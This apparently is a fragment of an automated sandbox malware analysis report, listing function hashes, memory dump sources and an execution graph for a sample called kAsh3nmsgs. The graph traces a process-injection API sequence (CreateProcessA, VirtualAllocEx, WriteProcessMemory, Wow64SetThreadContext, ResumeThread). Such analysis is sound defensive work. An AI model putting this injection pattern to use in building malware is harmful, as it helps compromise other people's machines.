                                                                                                                • Instruction ID: 77ae7ad2b8bf8695ee6f2f56641c1c9a4442b6a847e84c82e5bc5a138a0dc187
                                                                                                                • Opcode Fuzzy Hash: 717d4e75a609a6ccee26d3def001e24466ff6932efecea1898ba3832a03aa033
                                                                                                                • Instruction Fuzzy Hash: 57116136B141355FDF54E668D814AAF73EAABC8610F10853AD90AE7344EF64DC028BD1
                                                                                                                Function 06924280 Relevance: .1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4d33de7057a9087873d02e780f89511ebdfd28be0be279ea6b7db0d18e6cf699
                                                                                                                • Instruction ID: 150eda079e6adafcc3b1120b255ed6384b3a25a27839eb3af0113b39a33cdc87
                                                                                                                • Opcode Fuzzy Hash: 4d33de7057a9087873d02e780f89511ebdfd28be0be279ea6b7db0d18e6cf699
                                                                                                                • Instruction Fuzzy Hash: 1B01F9307001611BCB65967DD41472FBBDADBCAA10F288839E10EC7B49DA11DC428381
                                                                                                                Function 0692A357 Relevance: .1, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d7ff1d13b71c0e837b8f9614fec793180fdd6f0f87551db33246520ca898616e
                                                                                                                • Instruction ID: 38d4f01802666063f10c4c2ec70abeb011e11e76f319e14782bd769a142768ff
                                                                                                                • Opcode Fuzzy Hash: d7ff1d13b71c0e837b8f9614fec793180fdd6f0f87551db33246520ca898616e
                                                                                                                • Instruction Fuzzy Hash: 6101D831B001111FD761EB3DD85475EBBDAEB87614F20887AE54ACB749EF21DD028395
                                                                                                                Function 069238F8 Relevance: .1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9f8fda38f5d730c6d9b47e1938c22fd05e123dfbb63d73d75f23c12a36acee25
                                                                                                                • Instruction ID: 37c35ad746dc20edada7865a031a1c0ab74b54932a229d6e601327b5a2c2b841
                                                                                                                • Opcode Fuzzy Hash: 9f8fda38f5d730c6d9b47e1938c22fd05e123dfbb63d73d75f23c12a36acee25
                                                                                                                • Instruction Fuzzy Hash: 9021E0B5D01219EFCB00DF9AD884ADEFFB8FB49310F10812AE918A7240C774A550CFA5
                                                                                                                Function 06923C2F Relevance: .1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 502d793e71026ae9caaccf3b8edc1d24aa3591489216fcaa7d144141c3730853
                                                                                                                • Instruction ID: 9a1665619a434173bf96bef37d76f881b5e0a2fa87b7090537ea1f8c28204a40
                                                                                                                • Opcode Fuzzy Hash: 502d793e71026ae9caaccf3b8edc1d24aa3591489216fcaa7d144141c3730853
                                                                                                                • Instruction Fuzzy Hash: F801F532B140351BDF54D679D8106EB7BEB9BC8A10F14813AD90AD7244EF649C028BD6
                                                                                                                Function 0112D3B7 Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: a5a04a3c81f70146e6d0da88c38d16de8e57fe534c5f6cb113a38101c3ca4367
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: 0211DD75504280CFDB0ACF54E5C4B55BFA2FB84318F24C6AAD8494BA56C33AE41ACBA1
                                                                                                                Function 0112D03F Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: b4d83f6093b65762d9c4574ad4cbe4fad97f221ee9551c418e14b20e18023d88
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: E711DD75504284CFDB1ACF64D9C4B16BFA2FB84314F24C6AAD8494B662C33AD45ACF62
                                                                                                                Function 0112D207 Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4149152632.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_112d000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                • Instruction ID: 87aa63ea5b3e573e4ab12ee2009699cf6ae7a13e8c629cbcf197f34f3d93ef1a
                                                                                                                • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                • Instruction Fuzzy Hash: D911EF76504284CFDB06CF54E5C4B16FF61FB85324F24C6AADC490B646C33AD41ACBA2
                                                                                                                Function 0692EDE9 Relevance: .1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 899b176c3cbc22c40c57a8039c77f3320aef32594f2d073b84da9f3f060abfb7
                                                                                                                • Instruction ID: d39725f1c9a56c7f119ba3c3b88fb3324254dcd75e04601f15b4c46468e80425
                                                                                                                • Opcode Fuzzy Hash: 899b176c3cbc22c40c57a8039c77f3320aef32594f2d073b84da9f3f060abfb7
                                                                                                                • Instruction Fuzzy Hash: 1C01A735B140114FCB65DB7DD494B3E77EAEBC9614F248839E50EC7349DA21DD028385
                                                                                                                Function 06923900 Relevance: .1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2b398050ec0975f9c30789671357ab847d18464f717a6fa1ca36402a516ba69b
                                                                                                                • Instruction ID: cfbad164462ac863c8a3f52fb1fa46d6a6d4ac4180c6353493344b2a2a0cc497
                                                                                                                • Opcode Fuzzy Hash: 2b398050ec0975f9c30789671357ab847d18464f717a6fa1ca36402a516ba69b
                                                                                                                • Instruction Fuzzy Hash: 5911A2B5D01259EFCB00DF9AD884ADEFBB4FB49310F50812AE518A7250C374A554CFA5
                                                                                                                Function 06924290 Relevance: .1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05b9e14dd6d03a8c158cccc155db9558f987707f07dd1a53ba0f9906e545ca4c
                                                                                                                • Instruction ID: a4d7ec111006227996f82de98ab070c8618577825b288fa80898abdb4f5f2650
                                                                                                                • Opcode Fuzzy Hash: 05b9e14dd6d03a8c158cccc155db9558f987707f07dd1a53ba0f9906e545ca4c
                                                                                                                • Instruction Fuzzy Hash: 6E018635B101211BDB54966ED454B2FB7DFEBC9B10F24843AE60EC7B48DE61DC424395
                                                                                                                Function 0692FF2B Relevance: .0, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 671ea80f6ce60471eb9ec98a68b4786625b5af97d10b734c754062db6808c805
                                                                                                                • Instruction ID: f6ba52e43027db79bb6ee87c70bf49ac7c6ca9fa160a2dc18bf8955990aae157
                                                                                                                • Opcode Fuzzy Hash: 671ea80f6ce60471eb9ec98a68b4786625b5af97d10b734c754062db6808c805
                                                                                                                • Instruction Fuzzy Hash: B801D675A092858FDB41EBB8E9503EDBFB1EB45304F1041BBC449CB65AEB308D05CB92
                                                                                                                Function 0692EDF8 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 90b279d33658472ce2cfb0999d7699f7ded9b06362b5c1bd67c95f8528b5027a
                                                                                                                • Instruction ID: 078d2d8262c02735c7e521d24140beba7346998abd45d50748a332cdd315e96c
                                                                                                                • Opcode Fuzzy Hash: 90b279d33658472ce2cfb0999d7699f7ded9b06362b5c1bd67c95f8528b5027a
                                                                                                                • Instruction Fuzzy Hash: 3501A435B100225BCB64967DA49473EB3DADBC9624F248839F60EC7348DE21DC024395
                                                                                                                Function 0692A368 Relevance: .0, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1a8ca5bf6bc6c96246d452a36328d004254a4aeca1162e6297ec6d541475035d
                                                                                                                • Instruction ID: 3a136cc6de5074141fa0f66780a9df841a6d568cb6ef3cc22494d55fddc00d58
                                                                                                                • Opcode Fuzzy Hash: 1a8ca5bf6bc6c96246d452a36328d004254a4aeca1162e6297ec6d541475035d
                                                                                                                • Instruction Fuzzy Hash: 70018131B101254FCB50AA2DE85472EB7DAEB8A714F208839E50ACB348EA21DC014385
                                                                                                                Function 0692FF48 Relevance: .0, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d4f1638d05a2b3f276c83de61289d538d1c58a7694adc163d0558afd00beffc6
                                                                                                                • Instruction ID: e5a7a7dddbd521a5fe4a2aafffbb8d4e35c05873af409c8fb92ab9656b6fab6f
                                                                                                                • Opcode Fuzzy Hash: d4f1638d05a2b3f276c83de61289d538d1c58a7694adc163d0558afd00beffc6
                                                                                                                • Instruction Fuzzy Hash: 4FF03A74A502458FD780EFB885402AEB7F6FB88300F104179890AC371CEB30CE41CB92
                                                                                                                Function 069264C9 Relevance: .0, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4877b6df37158decda46ca15c79cd665d1911b23201757f2a47eec533b6f1c06
                                                                                                                • Instruction ID: 4c7e75a2c09c8fc5b3a12437d2be03c0f975b9acc2afbf3a938ca732b0ece6be
                                                                                                                • Opcode Fuzzy Hash: 4877b6df37158decda46ca15c79cd665d1911b23201757f2a47eec533b6f1c06
                                                                                                                • Instruction Fuzzy Hash: 1FE06830E192996BDF21CFB4D91479A7FBDDB02204F3089E5D484CB542E472CE01D392

                                                                                                                Non-executed Functions

                                                                                                                Function 069276F8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2222239885
                                                                                                                • Opcode ID: 5dfe97093386f8f5f4d607c189f0aa1ac72564aedab7cadc42066769f3285a2c
                                                                                                                • Instruction ID: ab90e184dffb08adeb452ee0af389f10034f14b1f916f2117d7e9bcae0fa0e69
                                                                                                                • Opcode Fuzzy Hash: 5dfe97093386f8f5f4d607c189f0aa1ac72564aedab7cadc42066769f3285a2c
                                                                                                                • Instruction Fuzzy Hash: 1F122D30E0022A8FDB68DFB5C954A5EB7F6BF89704F208569D409AF758DB309D85CB81
                                                                                                                Function 0692A990 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                • Opcode ID: 494cb61b8f9da9da06a503a6b6febad7ba6ce39e0e056075218ff51064a4d18b
                                                                                                                • Instruction ID: a86043a624d7d46d80944f4c6c40a743996a03df7034ef853329a4985750d26f
                                                                                                                • Opcode Fuzzy Hash: 494cb61b8f9da9da06a503a6b6febad7ba6ce39e0e056075218ff51064a4d18b
                                                                                                                • Instruction Fuzzy Hash: A1919F31E0021ADFEB68EF65D954B6EB7F6AF84710F208829E402DB758DB349D45CB90
                                                                                                                Function 069270F8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-390881366
                                                                                                                • Opcode ID: d8dd47c8850e77714627ffb963af0fa66b67788d69e74b959727031228508509
                                                                                                                • Instruction ID: cb24295c13af3dfb2d9981402e0fbbbe1a450574cc12971cd0a78fd6d0419aa3
                                                                                                                • Opcode Fuzzy Hash: d8dd47c8850e77714627ffb963af0fa66b67788d69e74b959727031228508509
                                                                                                                • Instruction Fuzzy Hash: 57F13C30A0021ACFDB58EBA8D594B6EB7B6BF85304F248569D405AF75CDB71DC82CB81
                                                                                                                Function 06928428 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: d73c47693915b28a54950acd96d0c72996cbb12480eb84a08283b2516c5356f6
                                                                                                                • Instruction ID: 12f117813f84323888861741df0232b70493e129256207193cf5d63b84a1c440
                                                                                                                • Opcode Fuzzy Hash: d73c47693915b28a54950acd96d0c72996cbb12480eb84a08283b2516c5356f6
                                                                                                                • Instruction Fuzzy Hash: 04B15F30A1021A8FDB58EF68D68465EB7B6FF88304F24C829D405DB758DB75DC86CB80
                                                                                                                Function 0692AD18 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                • Opcode ID: 60bf22639a21b23bc77e451fb3a8955184a8006bc3c3b15543784a08adabce21
                                                                                                                • Instruction ID: 9c72479774f36da39ac1ecf8ee9a3392232eac0d5fecfe503f2c5626beaace74
                                                                                                                • Opcode Fuzzy Hash: 60bf22639a21b23bc77e451fb3a8955184a8006bc3c3b15543784a08adabce21
                                                                                                                • Instruction Fuzzy Hash: F051E731E102168FDF65EB64D9846AEB7B6EF89311F24892AD406DB75CDB30DC42CB90
                                                                                                                Function 06928840 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                • API String ID: 0-2454687669
                                                                                                                • Opcode ID: cfd50992d287821658531f2781f90c00bd0e2a6ee9b6fc83c77c8755209041f7
                                                                                                                • Instruction ID: 4f51f0cd9476df51a074a1d61d19a2b7671da884ecd56aa8b61e5b1c70b49a2a
                                                                                                                • Opcode Fuzzy Hash: cfd50992d287821658531f2781f90c00bd0e2a6ee9b6fc83c77c8755209041f7
                                                                                                                • Instruction Fuzzy Hash: 7851B330B002168FDB58EB28D954B6AB7F6FF88314B148968E415DB79DDB30EC45CB91

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:12.3%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:217
                                                                                                                Total number of Limit Nodes:12
                                                                                                                execution_graph 31665 b2d1448 31666 b2d145d 31665->31666 31673 b2d1778 31666->31673 31678 b2d1490 31666->31678 31682 b2d1534 31666->31682 31689 b2d14f5 31666->31689 31693 b2d1488 31666->31693 31667 b2d1476 31676 b2d14da 31673->31676 31677 b2d177b 31673->31677 31674 b2d15fc 31674->31667 31675 b2d1338 PostMessageW 31675->31676 31676->31673 31676->31674 31676->31675 31677->31667 31680 b2d14b7 31678->31680 31679 b2d1338 PostMessageW 31679->31680 31680->31679 31681 b2d15fc 31680->31681 31681->31667 31697 b2d1338 31682->31697 31684 b2d153f 31685 b2d1338 PostMessageW 31684->31685 31687 b2d14da 31684->31687 31685->31687 31686 b2d1338 PostMessageW 31686->31687 31687->31686 31688 b2d15fc 31687->31688 31688->31667 31690 b2d1504 31689->31690 31691 b2d1338 PostMessageW 31690->31691 31692 b2d152d 31691->31692 31695 b2d14b7 31693->31695 31694 b2d1338 PostMessageW 31694->31695 31695->31694 31696 b2d15fc 31695->31696 31696->31667 31698 b2d1348 31697->31698 31701 b2d1358 31698->31701 31702 b2dfa08 31698->31702 31706 b2dfa68 31698->31706 31701->31684 31703 b2dfa14 31702->31703 31704 b2dfa68 PostMessageW 31703->31704 31705 b2dfa22 31703->31705 31704->31705 31705->31701 31707 b2dfa6b 31706->31707 31709 b2dfa22 31706->31709 31708 b2dfa0a 31707->31708 31711 b2dfa6f 31707->31711 31708->31709 31712 b2dfa68 PostMessageW 31708->31712 31709->31701 31711->31709 31713 b2d93f8 31711->31713 31712->31709 31714 b2dfcf8 PostMessageW 31713->31714 31715 b2dfd64 31714->31715 31715->31711 31716 b2dcf1a 31720 b2de840 31716->31720 31733 b2de893 31716->31733 31717 b2dcf29 31721 b2de85a 31720->31721 31727 b2de862 31721->31727 31746 b2def3f 31721->31746 31751 b2ded62 31721->31751 31756 b2dedc6 31721->31756 31761 b2df046 31721->31761 31765 b2ded6e 31721->31765 31773 b2dee0f 31721->31773 31778 b2df1b2 31721->31778 31783 b2ded10 31721->31783 31788 b2dec70 31721->31788 31792 b2dedfb 31721->31792 31727->31717 31734 b2de834 31733->31734 31735 b2de862 31734->31735 31736 b2dee0f 2 API calls 31734->31736 31737 b2ded6e 4 API calls 31734->31737 31738 b2df046 2 API calls 31734->31738 31739 b2dedc6 2 API calls 31734->31739 31740 b2ded62 2 API calls 31734->31740 31741 b2def3f 2 API calls 31734->31741 31742 b2dedfb 2 API calls 31734->31742 31743 b2dec70 2 API calls 31734->31743 31744 b2ded10 2 API calls 31734->31744 31745 b2df1b2 2 API calls 31734->31745 31735->31717 31736->31735 31737->31735 31738->31735 31739->31735 31740->31735 31741->31735 31742->31735 31743->31735 31744->31735 31745->31735 31747 b2def5a 31746->31747 31797 b2dc7e8 31747->31797 31801 b2dc7e1 31747->31801 31748 b2df301 31752 b2ded17 31751->31752 31753 b2ded43 31752->31753 31805 b2dc599 31752->31805 31809 b2dc5a0 31752->31809 31753->31727 31757 b2df56f 31756->31757 31759 b2dc7e8 WriteProcessMemory 31757->31759 31760 b2dc7e1 WriteProcessMemory 31757->31760 31758 b2df590 31759->31758 31760->31758 31813 b2dc648 31761->31813 31817 b2dc650 31761->31817 31762 b2df06a 31821 b2dc728 31765->31821 31825 b2dc720 31765->31825 31766 b2df4ce 31766->31727 31767 b2ded8c 31767->31766 31771 b2dc7e8 WriteProcessMemory 31767->31771 31772 b2dc7e1 WriteProcessMemory 31767->31772 31768 b2df590 31771->31768 31772->31768 31774 b2defb4 31773->31774 31829 b2dc8d8 31774->31829 31833 b2dc8d0 31774->31833 31775 b2decf2 31775->31727 31779 b2df655 31778->31779 31781 b2dc648 Wow64SetThreadContext 31779->31781 31782 b2dc650 Wow64SetThreadContext 31779->31782 31780 b2df670 31781->31780 31782->31780 31784 b2ded16 31783->31784 31786 b2dc599 ResumeThread 31784->31786 31787 b2dc5a0 ResumeThread 31784->31787 31785 b2ded43 31785->31727 31786->31785 31787->31785 31837 b2dca65 31788->31837 31841 b2dca70 31788->31841 31789 b2deca0 31793 b2df1ca 31792->31793 31795 b2dc7e8 WriteProcessMemory 31793->31795 31796 b2dc7e1 WriteProcessMemory 31793->31796 31794 b2df3d9 31795->31794 31796->31794 31798 b2dc7ee WriteProcessMemory 31797->31798 31800 b2dc887 31798->31800 31800->31748 31802 b2dc7e4 WriteProcessMemory 31801->31802 31804 b2dc887 31802->31804 31804->31748 31806 b2dc59c ResumeThread 31805->31806 31808 b2dc611 31806->31808 31808->31753 31810 b2dc5a6 ResumeThread 31809->31810 31812 b2dc611 31810->31812 31812->31753 31814 b2dc695 Wow64SetThreadContext 31813->31814 31816 b2dc6dd 31814->31816 31816->31762 31818 b2dc695 Wow64SetThreadContext 31817->31818 31820 b2dc6dd 31818->31820 31820->31762 31822 b2dc72e VirtualAllocEx 31821->31822 31824 b2dc7a5 31822->31824 31824->31767 31826 b2dc724 VirtualAllocEx 31825->31826 31828 b2dc7a5 31826->31828 31828->31767 31830 b2dc8de ReadProcessMemory 31829->31830 31832 b2dc967 31830->31832 31832->31775 31834 b2dc8d4 ReadProcessMemory 31833->31834 31836 b2dc967 31834->31836 31836->31775 31838 b2dca68 CreateProcessA 31837->31838 31840 b2dccbb 31838->31840 31840->31840 31842 b2dca76 CreateProcessA 31841->31842 31844 b2dccbb 31842->31844 31844->31844 31845 9886e30 31846 9886e31 31845->31846 31850 9886e58 31846->31850 31854 9886e68 31846->31854 31847 9886e4f 31851 9886e68 31850->31851 31858 9886ea0 31851->31858 31855 9886e71 31854->31855 31857 9886ea0 DrawTextExW 31855->31857 31856 9886e96 31856->31847 31857->31856 31860 9886eb0 31858->31860 31859 9886e96 31859->31847 31860->31859 31863 98875e0 31860->31863 31868 98875d4 31860->31868 31864 9887608 31863->31864 31865 988770e 31864->31865 31873 9887ce8 31864->31873 31878 9887cf8 31864->31878 31865->31859 31869 98875e0 31868->31869 31870 988770e 31869->31870 31871 9887ce8 DrawTextExW 31869->31871 31872 9887cf8 DrawTextExW 31869->31872 31870->31859 31871->31870 31872->31870 31874 9887cf8 31873->31874 31883 9888118 31874->31883 31887 9888109 31874->31887 31875 9887d84 31875->31865 31879 9887d0e 31878->31879 31881 9888118 DrawTextExW 31879->31881 31882 9888109 DrawTextExW 31879->31882 31880 9887d84 31880->31865 31881->31880 31882->31880 31892 9888158 31883->31892 31897 9888149 31883->31897 31884 9888136 31884->31875 31888 9888118 31887->31888 31890 9888158 DrawTextExW 31888->31890 31891 9888149 DrawTextExW 31888->31891 31889 9888136 31889->31875 31890->31889 31891->31889 31893 9888189 31892->31893 31894 98881b6 31893->31894 31902 98881d8 31893->31902 31907 98881c9 31893->31907 31894->31884 31898 9888189 31897->31898 31899 98881b6 31898->31899 31900 98881d8 DrawTextExW 31898->31900 31901 98881c9 DrawTextExW 31898->31901 31899->31884 31900->31899 31901->31899 31904 98881f9 31902->31904 31903 988820e 31903->31894 31904->31903 31912 988745c 31904->31912 31906 9888279 31909 98881d8 31907->31909 31908 988820e 31908->31894 31909->31908 31910 988745c DrawTextExW 31909->31910 31911 9888279 31910->31911 31913 9887467 31912->31913 31914 988a241 31913->31914 31918 988adaf 31913->31918 31922 988adc0 31913->31922 31914->31906 31915 988a354 31915->31906 31919 988adc0 31918->31919 31925 9889f84 31919->31925 31923 9889f84 DrawTextExW 31922->31923 31924 988addd 31923->31924 